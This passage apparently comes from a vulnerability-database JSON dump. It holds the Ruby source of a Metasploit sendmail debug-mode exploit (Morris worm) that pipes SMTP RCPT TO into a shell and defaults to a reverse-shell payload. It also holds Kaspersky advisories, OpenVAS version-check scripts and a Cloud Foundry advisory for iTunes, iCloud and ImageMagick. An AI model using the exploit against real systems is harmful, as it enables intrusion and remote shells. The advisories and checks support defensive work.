self.service.stop\n end\n self.service = nil\n rescue ::Exception\n end\n end\n end\n\n # Accessor for our TCP payload stager\n attr_accessor :service\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/misc/polycom_hdx_auth_bypass.rb"}, {"lastseen": "2019-11-27T21:14:00", "bulletinFamily": "exploit", "description": "This module exploits sendmail's well-known historical debug mode to escape to a shell and execute commands in the SMTP RCPT TO command. This vulnerability was exploited by the Morris worm in 1988-11-02. Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg. Currently only cmd/unix/reverse and cmd/unix/generic are supported.\n", "modified": "2018-11-16T18:18:28", "published": "2018-10-20T06:43:53", "id": "MSF:EXPLOIT/UNIX/SMTP/MORRIS_SENDMAIL_DEBUG", "href": "", "type": "metasploit", "title": "Morris Worm sendmail Debug Mode Shell Escape", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'expect'\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n # cmd/unix/reverse spams the session with Telnet codes on EOF\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Morris Worm sendmail Debug Mode Shell Escape',\n 'Description' => %q{\n This module exploits sendmail's well-known historical debug mode to\n escape to a shell and execute commands in the SMTP RCPT TO command.\n\n This vulnerability was exploited by the Morris worm in 1988-11-02.\n Cliff Stoll reports on the worm in the epilogue of The Cuckoo's Egg.\n\n Currently only cmd/unix/reverse and cmd/unix/generic are supported.\n },\n 'Author' => [\n 'Robert Tappan Morris', # Exploit and worm for sure\n 'Cliff Stoll', # The Cuckoo's Egg inspiration\n 'wvu' # Module and additional research\n ],\n 'References' => [\n ['URL', 'https://en.wikipedia.org/wiki/Morris_worm'], # History\n ['URL', 'https://spaf.cerias.purdue.edu/tech-reps/823.pdf'], # Analysis\n ['URL', 'https://github.com/arialdomartini/morris-worm'], # Source\n ['URL', 'http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH'] # Setup\n ],\n 'DisclosureDate' => '1988-11-02',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Privileged' => false, # DefUid in src/conf.c, usually \"daemon\"\n 'Payload' => {'Compat' => {'RequiredCmd' => 'generic telnet'}},\n 'Targets' => [\n # https://en.wikipedia.org/wiki/Source_Code_Control_System\n ['@(#)version.c 5.51 (Berkeley) 5/2/86', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse'}\n ))\n\n register_options([Opt::RPORT(25)])\n\n register_advanced_options([\n OptFloat.new('SendExpectTimeout', [true, 'Timeout per send/expect', 3.5])\n ])\n end\n\n def check\n checkcode = CheckCode::Safe\n\n connect\n res = sock.get_once\n\n return CheckCode::Unknown unless res\n\n if res =~ /^220.*Sendmail/\n checkcode = CheckCode::Detected\n end\n\n sock.put(\"DEBUG\\r\\n\")\n res = sock.get_once\n\n return checkcode unless res\n\n if res.start_with?('200 Debug set')\n checkcode = CheckCode::Appears\n end\n\n checkcode\n rescue Rex::ConnectionError => e\n vprint_error(e.message)\n CheckCode::Unknown\n ensure\n disconnect\n end\n\n def exploit\n # We don't care who the user is, so randomize it\n from = rand_text_alphanumeric(8..42)\n\n # Strip mail header with sed(1), pass to sh(1), and ensure a clean exit\n to = %(\"| sed '1,/^$/d' | sh; exit 0\")\n\n # We don't have $PATH, so set one\n path = '/bin:/usr/bin:/usr/ucb:/etc'\n\n sploit = {\n nil => /220.*Sendmail/,\n 'DEBUG' => /200 Debug set/,\n \"MAIL FROM:<#{from}>\" => /250.*Sender ok/,\n \"RCPT TO:<#{to}>\" => /250.*Recipient ok/,\n 'DATA' => /354 Enter mail/,\n # Indent PATH= so it's not interpreted as part of the mail header\n \" PATH=#{path}\" => nil,\n 'export PATH' => nil,\n payload.encoded => nil,\n '.' => /250 Ok/,\n 'QUIT' => /221.*closing connection/\n }\n\n print_status('Connecting to sendmail')\n connect\n\n print_status('Enabling debug mode and sending exploit')\n sploit.each do |line, pattern|\n Timeout.timeout(datastore['SendExpectTimeout']) do\n if line\n print_status(\"Sending: #{line}\")\n sock.put(\"#{line}\\r\\n\")\n end\n if pattern\n vprint_status(\"Expecting: #{pattern.inspect}\")\n sock.expect(pattern) do |pat|\n return unless pat\n vprint_good(\"Received: #{pat.first}\")\n end\n end\n end\n end\n rescue Rex::ConnectionError => e\n fail_with(Failure::Unreachable, e.message)\n rescue Timeout::Error\n fail_with(Failure::TimeoutExpired, 'SendExpectTimeout maxed out')\n ensure\n disconnect\n end\n\n def on_new_session(session)\n print_warning(\"Do NOT type `exit', or else you may lose further shells!\")\n print_warning('Hit ^C to abort the session instead, please and thank you')\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/smtp/morris_sendmail_debug.rb"}], "kaspersky": [{"lastseen": "2019-03-21T00:15:07", "bulletinFamily": "info", "description": "### *Detect date*:\n02/11/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Apple iCloud. Malicious users can exploit these vulnerabilities to execute arbitrary code, perform cross-site scripting attack.\n\n### *Affected products*:\nApple iCloud earlier than 7.10\n\n### *Solution*:\nUpdate to the latest version \n[Download iCloud for Windows](<https://support.apple.com/en-us/HT204283>)\n\n### *Original advisories*:\n[About the security content of iCloud for Windows 7.10](<https://support.apple.com/en-us/HT209451>) \n\n\n### *Impacts*:\nACE \n\n### *CVE-IDS*:\n[CVE-2018-20346](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20346>)7.5Critical \n[CVE-2018-20505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20505>)0.0Critical \n[CVE-2018-20506](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20506>)0.0Critical \n[CVE-2019-6215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6215>)0.0Critical \n[CVE-2019-6212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6212>)0.0Critical \n[CVE-2019-6216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6216>)0.0Critical \n[CVE-2019-6217](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6217>)0.0Critical \n[CVE-2019-6226](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6226>)0.0Critical \n[CVE-2019-6227](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6227>)0.0Critical \n[CVE-2019-6233](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6233>)0.0Critical \n[CVE-2019-6234](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6234>)0.0Critical \n[CVE-2019-6229](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6229>)0.0Critical", "modified": "2019-03-07T00:00:00", "published": "2019-02-11T00:00:00", "id": "KLA11409", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11409", "title": "\r KLA11409Multiple vulnerabilities in Apple iCloud ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-21T00:15:12", "bulletinFamily": "info", "description": "### *Detect date*:\n01/24/2019\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Apple iTunes. Malicious users can exploit these vulnerabilities to bypass security restrictions, gain privileges, execute arbitrary code, perform cross-site scripting attack.\n\n### *Affected products*:\nApple iTunes earlier than 12.9.3\n\n### *Solution*:\nUpdate to the latest version \n[Download iTunes](<https://www.apple.com/itunes/download/>)\n\n### *Original advisories*:\n[About the security content of iTunes 12.9.3 for Windows](<https://support.apple.com/en-us/HT209450>) \n\n\n### *Impacts*:\nACE \n\n### *CVE-IDS*:\n[CVE-2019-6235](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6235>)7.5Critical \n[CVE-2019-6221](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6221>)0.0Critical \n[CVE-2018-20346](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20346>)7.5Critical \n[CVE-2018-20505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20505>)0.0Critical \n[CVE-2018-20506](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20506>)0.0Critical \n[CVE-2019-6215](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6215>)0.0Critical \n[CVE-2019-6212](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6212>)0.0Critical \n[CVE-2019-6216](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6216>)0.0Critical \n[CVE-2019-6217](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6217>)0.0Critical \n[CVE-2019-6226](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6226>)0.0Critical \n[CVE-2019-6227](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6227>)0.0Critical \n[CVE-2019-6233](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6233>)0.0Critical \n[CVE-2019-6234](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6234>)0.0Critical \n[CVE-2019-6229](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6229>)0.0Critical", "modified": "2019-03-07T00:00:00", "published": "2019-01-24T00:00:00", "id": "KLA11408", "href": "https://threats.kaspersky.com/en/vulnerability/KLA11408", "title": "\r KLA11408Multiple vulnerabilities in Apple iTunes ", "type": "kaspersky", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2019-05-29T18:32:05", "bulletinFamily": "scanner", "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "modified": "2019-05-22T00:00:00", "published": "2019-01-25T00:00:00", "id": "OPENVAS:1361412562310814822", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814822", "title": "Apple iTunes Security Updates (HT209450)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Security Updates (HT209450)\n#\n# Authors:\n# Vidita V Koushik <vidita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2019 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814822\");\n script_version(\"2019-05-22T13:05:41+0000\");\n script_cve_id(\"CVE-2018-20346\", \"CVE-2018-20505\", \"CVE-2019-6212\", \"CVE-2019-6215\",\n \"CVE-2019-6216\", \"CVE-2019-6221\", \"CVE-2019-6227\", \"CVE-2019-6229\",\n \"CVE-2019-6233\", \"CVE-2018-20506\", \"CVE-2019-6217\", \"CVE-2019-6234\",\n \"CVE-2019-6235\", \"CVE-2019-6226\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 13:05:41 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-01-25 14:09:57 +0530 (Fri, 25 Jan 2019)\");\n script_name(\"Apple iTunes Security Updates (HT209450)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption issues.\n\n - An out-of-bounds read error.\n\n - A type confusion issue.\n\n - A logic issue.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation allows attackers to elevate\n privileges, conduct universal cross site scripting and execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.9.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.9.3 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209450\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE )) exit(0);\nappVer = infos['version'];\nappPath = infos['location'];\n\nif(version_is_less(version:appVer, test_version:\"12.9.3\"))\n{\n report = report_fixed_ver(installed_version:appVer, fixed_version:\"12.9.3\", install_path: appPath);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:04", "bulletinFamily": "scanner", "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "modified": "2019-05-22T00:00:00", "published": "2019-01-23T00:00:00", "id": "OPENVAS:1361412562310814821", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814821", "title": "Apple iCloud Security Updates (HT209451)-Windows", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Security Updates (HT209451)-Windows\n#\n# Authors:\n# Vidita V Koushik <vidita@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2019 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814821\");\n script_version(\"2019-05-22T13:05:41+0000\");\n script_cve_id(\"CVE-2018-20346\", \"CVE-2018-20505\", \"CVE-2018-20506\", \"CVE-2019-6215\",\n \"CVE-2019-6212\", \"CVE-2019-6216\", \"CVE-2019-6217\", \"CVE-2019-6226\",\n \"CVE-2019-6227\", \"CVE-2019-6233\", \"CVE-2019-6234\", \"CVE-2019-6229\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 13:05:41 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-01-23 13:00:19 +0530 (Wed, 23 Jan 2019)\");\n script_name(\"Apple iCloud Security Updates (HT209451)-Windows\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\n present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Multiple memory corruption issues exists in input validation and memory\n handling.\n\n - A type confusion issue and\n\n - A logic issue exists.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allows remote\n attackers to execute arbitrary code and conduct cross site scripting by\n processing maliciously crafted web content.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.10 om Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.10 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT209451\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nicVer = infos['version'];\nicPath = infos['location'];\n\n# 7.10 => 7.10.0.9\nif(version_is_less(version:icVer, test_version:\"7.10.0.9\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"7.10\", install_path:icPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:24", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-10-05T00:00:00", "id": "OPENVAS:1361412562310843653", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843653", "title": "Ubuntu Update for imagemagick USN-3785-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3785_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for imagemagick USN-3785-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843653\");\n script_version(\"$Revision: 14288 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-05 08:17:46 +0200 (Fri, 05 Oct 2018)\");\n script_cve_id(\"CVE-2018-14434\", \"CVE-2018-14435\", \"CVE-2018-14436\", \"CVE-2018-14437\",\n \"CVE-2018-16640\", \"CVE-2018-16750\", \"CVE-2018-14551\", \"CVE-2018-16323\",\n \"CVE-2018-16642\", \"CVE-2018-16643\", \"CVE-2018-16644\", \"CVE-2018-16645\",\n \"CVE-2018-16749\", \"CVE-2017-13144\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for imagemagick USN-3785-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'imagemagick'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is\npresent on the target host.\");\n script_tag(name:\"insight\", value:\"Due to a large number of issues discovered\nin GhostScript that prevent it from being used by ImageMagick safely, this update\nincludes a default policy change that disables support for the Postscript and\nPDF formats in ImageMagick. This policy can be overridden if necessary\nby using an alternate ImageMagick policy configuration.\n\nIt was discovered that several memory leaks existed when handling\ncertain images in ImageMagick. An attacker could use this to cause a\ndenial of service. (CVE-2018-14434, CVE-2018-14435, CVE-2018-14436,\nCVE-2018-14437, CVE-2018-16640, CVE-2018-16750)\n\nIt was discovered that ImageMagick did not properly initialize a\nvariable before using it when processing MAT images. An attacker could\nuse this to cause a denial of service or possibly execute arbitrary\ncode. This issue only affected Ubuntu 18.04 LTS. (CVE-2018-14551)\n\nIt was discovered that an information disclosure vulnerability existed\nin ImageMagick when processing XBM images. An attacker could use this\nto expose sensitive information. (CVE-2018-16323)\n\nIt was discovered that an out-of-bounds write vulnerability existed\nin ImageMagick when handling certain images. An attacker could use\nthis to cause a denial of service or possibly execute arbitrary code.\n(CVE-2018-16642)\n\nIt was discovered that ImageMagick did not properly check for errors\nin some situations. An attacker could use this to cause a denial of\nservice. (CVE-2018-16643)\n\nIt was discovered that ImageMagick did not properly validate image\nmeta data in some situations. An attacker could use this to cause a\ndenial of service. (CVE-2018-16644)\n\nIt was discovered that ImageMagick did not prevent excessive memory\nallocation when handling certain image types. An attacker could use\nthis to cause a denial of service. (CVE-2018-16645)\n\nSergej Schumilo and Cornelius Aschermann discovered that ImageMagick\ndid not properly check for NULL in some situations when processing\nPNG images. An attacker could use this to cause a denial of service.\n(CVE-2018-16749)\n\nUSN-3681-1 fixed vulnerabilities in Imagemagick. Unfortunately,\nthe fix for CVE-2017-13144 introduced a regression in ImageMagick in\nUbuntu 14.04 LTS and Ubuntu 16.04 LTS. This update reverts the fix\nfor CVE-2017-13144 for those releases.\n\nWe apologize for the inconvenience.\");\n script_tag(name:\"affected\", value:\"imagemagick on Ubuntu 18.04 LTS,\n Ubuntu 16.04 LTS,\n Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3785-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3785-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.04 LTS|18\\.04 LTS|16\\.04 LTS)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.7.7.10-6ubuntu3.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagick++5\", ver:\"8:6.7.7.10-6ubuntu3.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore5\", ver:\"8:6.7.7.10-6ubuntu3.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore5-extra\", ver:\"8:6.7.7.10-6ubuntu3.13\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.9.7.4+dfsg-16ubuntu6.4\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.9.7.4+dfsg-16ubuntu6.4\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-7\", ver:\"8:6.9.7.4+dfsg-16ubuntu6.4\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-3\", ver:\"8:6.9.7.4+dfsg-16ubuntu6.4\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-3-extra\", ver:\"8:6.9.7.4+dfsg-16ubuntu6.4\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"imagemagick\", ver:\"8:6.8.9.9-7ubuntu5.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"imagemagick-6.q16\", ver:\"8:6.8.9.9-7ubuntu5.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagick++-6.q16-5v5\", ver:\"8:6.8.9.9-7ubuntu5.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2\", ver:\"8:6.8.9.9-7ubuntu5.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libmagickcore-6.q16-2-extra\", ver:\"8:6.8.9.9-7ubuntu5.13\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudfoundry": [{"lastseen": "2019-05-29T18:32:52", "bulletinFamily": "software", "description": "# \n\n# Severity\n\nMedium\n\n# Vendor\n\nCanonical Ubuntu\n\n# Versions Affected\n\n * Canonical Ubuntu 14.04\n * Canonical Ubuntu 18.04\n\n# Description\n\nDue to a large number of issues discovered in GhostScript that prevent it from being used by ImageMagick safely, this update includes a default policy change that disables support for the Postscript and PDF formats in ImageMagick. This policy can be overridden if necessary by using an alternate ImageMagick policy configuration.\n\nIt was discovered that several memory leaks existed when handling certain images in ImageMagick. An attacker could use this to cause a denial of service. (CVE-2018-14434, CVE-2018-14435, CVE-2018-14436, CVE-2018-14437, CVE-2018-16640, CVE-2018-16750)\n\nIt was discovered that ImageMagick did not properly initialize a variable before using it when processing MAT images. An attacker could use this to cause a denial of service or possibly execute arbitrary code. This issue only affected Ubuntu 18.04 LTS. (CVE-2018-14551)\n\nIt was discovered that an information disclosure vulnerability existed in ImageMagick when processing XBM images. An attacker could use this to expose sensitive information. (CVE-2018-16323)\n\nIt was discovered that an out-of-bounds write vulnerability existed in ImageMagick when handling certain images. An attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2018-16642)\n\nIt was discovered that ImageMagick did not properly check for errors in some situations. An attacker could use this to cause a denial of service. (CVE-2018-16643)\n\nIt was discovered that ImageMagick did not properly validate image meta data in some situations. An attacker could use this to cause a denial of service. (CVE-2018-16644)\n\nIt was discovered that ImageMagick did not prevent excessive memory allocation when handling certain image types. An attacker could use this to cause a denial of service. (CVE-2018-16645)\n\nSergej Schumilo and Cornelius Aschermann discovered that ImageMagick did not properly check for NULL in some situations when processing PNG images. An attacker could use this to cause a denial of service. (CVE-2018-16749)\n\nUSN-3681-1 fixed vulnerabilities in Imagemagick. Unfortunately, the fix for CVE-2017-13144 introduced a regression in ImageMagick in Ubuntu 14.04 LTS and Ubuntu 16.04 LTS. This update reverts the fix for CVE-2017-13144 for those releases.\n\nWe apologize for the inconvenience.\n\nCVEs contained in this USN include: CVE-2018-14434, CVE-2018-14435, CVE-2018-14436, CVE-2018-14437, CVE-2018-14551, CVE-2018-16323, CVE-2018-16640, CVE-2018-16642, CVE-2018-16643, CVE-2018-16644, CVE-2018-16645, CVE-2018-16749, CVE-2018-16750\n\n# Affected Cloud Foundry Products and Versions\n\n_Severity is medium unless otherwise noted._\n\n * All versions of Cloud Foundry cflinuxfs2 prior to 1.240.0\n * All versions of Cloud Foundry cflinuxfs3 prior to 0.28.0\n\n# Mitigation\n\nUsers of affected products are strongly encouraged to follow one of the mitigations below:\n\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs2 version 1.240.0 or later.\n * The Cloud Foundry project recommends that Cloud Foundry deployments run with cflinuxfs3 version 0.28.0 or later.\n\n# References\n\n * [USN-3785-1](<https://usn.ubuntu.com/3785-1>)\n * [CVE-2018-14434](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14434>)\n * 